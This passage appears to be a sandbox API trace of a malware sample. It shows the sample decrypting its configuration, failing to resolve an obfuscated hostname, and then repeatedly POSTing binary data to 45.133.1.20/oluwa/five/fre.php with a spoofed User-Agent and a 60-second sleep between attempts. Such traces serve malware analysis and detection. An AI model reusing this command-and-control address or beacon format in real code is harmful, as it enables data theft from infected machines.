(s=0x988, buf=0x6bb998*, len=159, flags=0) returned 159 [0270.847] GetProcessHeap () returned 0x6a0000 [0270.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0270.847] recv (in: s=0x988, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0270.925] GetProcessHeap () returned 0x6a0000 [0270.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0270.927] GetProcessHeap () returned 0x6a0000 [0270.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0270.927] GetProcessHeap () returned 0x6a0000 [0270.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba770 | out: hHeap=0x6a0000) returned 1 [0270.928] GetProcessHeap () returned 0x6a0000 [0270.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0270.928] closesocket (s=0x988) returned 0 [0270.929] GetProcessHeap () returned 0x6a0000 [0270.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0270.930] GetProcessHeap () returned 0x6a0000 [0270.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0270.930] GetProcessHeap () returned 0x6a0000 [0270.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0270.930] GetProcessHeap () returned 0x6a0000 [0270.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0270.931] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1714) returned 0x988 [0270.944] Sleep (dwMilliseconds=0xea60) [0270.946] GetProcessHeap () returned 0x6a0000 [0270.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0270.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.947] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.955] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0270.961] GetProcessHeap () returned 0x6a0000 [0270.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0270.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.962] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0270.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.967] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.968] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.968] GetProcessHeap () returned 0x6a0000 [0270.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0270.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.969] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0270.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.970] CryptDestroyKey (hKey=0x6ad020) returned 1 [0270.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.971] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0270.971] GetProcessHeap () returned 0x6a0000 [0270.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0270.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.972] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0270.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.973] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0270.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.974] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0270.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.977] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0270.977] GetProcessHeap () returned 0x6a0000 [0270.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0270.977] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0270.978] GetProcessHeap () returned 0x6a0000 [0270.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0270.978] GetProcessHeap () returned 0x6a0000 [0270.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0270.979] GetProcessHeap () returned 0x6a0000 [0270.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0270.979] GetProcessHeap () returned 0x6a0000 [0270.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0270.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.980] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.987] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0270.993] GetProcessHeap () returned 0x6a0000 [0270.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0270.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.994] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0270.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.995] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.998] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.998] GetProcessHeap () returned 0x6a0000 [0270.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0271.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.000] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0271.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.001] CryptDestroyKey (hKey=0x6ad020) returned 1 [0271.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.002] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0271.002] GetProcessHeap () returned 0x6a0000 [0271.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0271.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.003] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0271.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.004] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0271.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.005] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0271.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.006] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0271.006] GetProcessHeap () returned 0x6a0000 [0271.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0271.006] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0271.006] GetProcessHeap () returned 0x6a0000 [0271.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0271.006] socket (af=2, type=1, protocol=6) returned 0x98c [0271.007] connect (s=0x98c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0271.031] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0271.031] GetProcessHeap () returned 0x6a0000 [0271.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0271.031] GetProcessHeap () returned 0x6a0000 [0271.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0271.032] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0271.033] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0271.033] GetProcessHeap () returned 0x6a0000 [0271.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9db0 [0271.033] GetProcessHeap () returned 0x6a0000 [0271.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0271.034] GetProcessHeap () returned 0x6a0000 [0271.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0271.034] GetProcessHeap () returned 0x6a0000 [0271.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0271.035] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0271.035] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0271.036] GetProcessHeap () returned 0x6a0000 [0271.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0271.036] GetProcessHeap () returned 0x6a0000 [0271.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0271.036] send (s=0x98c, buf=0x6bd460*, len=242, flags=0) returned 242 [0271.037] send (s=0x98c, buf=0x6bb998*, len=159, flags=0) returned 159 [0271.037] GetProcessHeap () returned 0x6a0000 [0271.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0271.037] recv (in: s=0x98c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0271.193] GetProcessHeap () returned 0x6a0000 [0271.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0271.194] GetProcessHeap () returned 0x6a0000 [0271.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0271.194] GetProcessHeap () returned 0x6a0000 [0271.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9db0 | out: hHeap=0x6a0000) returned 1 [0271.196] GetProcessHeap () returned 0x6a0000 [0271.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0271.196] closesocket (s=0x98c) returned 0 [0271.197] GetProcessHeap () returned 0x6a0000 [0271.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0271.197] GetProcessHeap () returned 0x6a0000 [0271.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0271.197] GetProcessHeap () returned 0x6a0000 [0271.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0271.198] GetProcessHeap () returned 0x6a0000 [0271.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0271.198] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1718) returned 0x98c [0271.200] Sleep (dwMilliseconds=0xea60) [0271.201] GetProcessHeap () returned 0x6a0000 [0271.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0271.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.212] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0271.220] GetProcessHeap () returned 0x6a0000 [0271.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0271.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.221] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0271.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.222] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.223] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.223] GetProcessHeap () returned 0x6a0000 [0271.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0271.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.225] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0271.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.226] CryptDestroyKey (hKey=0x6ad020) returned 1 [0271.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.230] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0271.230] GetProcessHeap () returned 0x6a0000 [0271.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0271.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.232] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0271.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.233] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0271.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.245] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0271.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.246] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0271.246] GetProcessHeap () returned 0x6a0000 [0271.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0271.246] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0271.246] GetProcessHeap () returned 0x6a0000 [0271.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0271.247] GetProcessHeap () returned 0x6a0000 [0271.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0271.247] GetProcessHeap () returned 0x6a0000 [0271.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0271.248] GetProcessHeap () returned 0x6a0000 [0271.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0271.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.249] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.255] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0271.265] GetProcessHeap () returned 0x6a0000 [0271.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0271.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.266] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0271.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.267] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.268] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.268] GetProcessHeap () returned 0x6a0000 [0271.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0271.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.270] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0271.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.271] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0271.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.274] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0271.274] GetProcessHeap () returned 0x6a0000 [0271.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0271.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.275] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0271.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.276] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0271.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.277] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0271.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.278] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0271.278] GetProcessHeap () returned 0x6a0000 [0271.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0271.278] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0271.278] GetProcessHeap () returned 0x6a0000 [0271.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0271.278] socket (af=2, type=1, protocol=6) returned 0x990 [0271.279] connect (s=0x990, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0271.302] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0271.303] GetProcessHeap () returned 0x6a0000 [0271.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0271.303] GetProcessHeap () returned 0x6a0000 [0271.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0271.303] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0271.306] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0271.306] GetProcessHeap () returned 0x6a0000 [0271.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba470 [0271.306] GetProcessHeap () returned 0x6a0000 [0271.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0271.306] GetProcessHeap () returned 0x6a0000 [0271.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0271.306] GetProcessHeap () returned 0x6a0000 [0271.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0271.307] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0271.309] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0271.309] GetProcessHeap () returned 0x6a0000 [0271.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0271.309] GetProcessHeap () returned 0x6a0000 [0271.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0271.310] send (s=0x990, buf=0x6bd460*, len=242, flags=0) returned 242 [0271.311] send (s=0x990, buf=0x6bb998*, len=159, flags=0) returned 159 [0271.311] GetProcessHeap () returned 0x6a0000 [0271.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0271.311] recv (in: s=0x990, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0271.389] GetProcessHeap () returned 0x6a0000 [0271.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0271.390] GetProcessHeap () returned 0x6a0000 [0271.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0271.390] GetProcessHeap () returned 0x6a0000 [0271.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba470 | out: hHeap=0x6a0000) returned 1 [0271.390] GetProcessHeap () returned 0x6a0000 [0271.390] HeapFree (in: hHeap=0x6a0000, 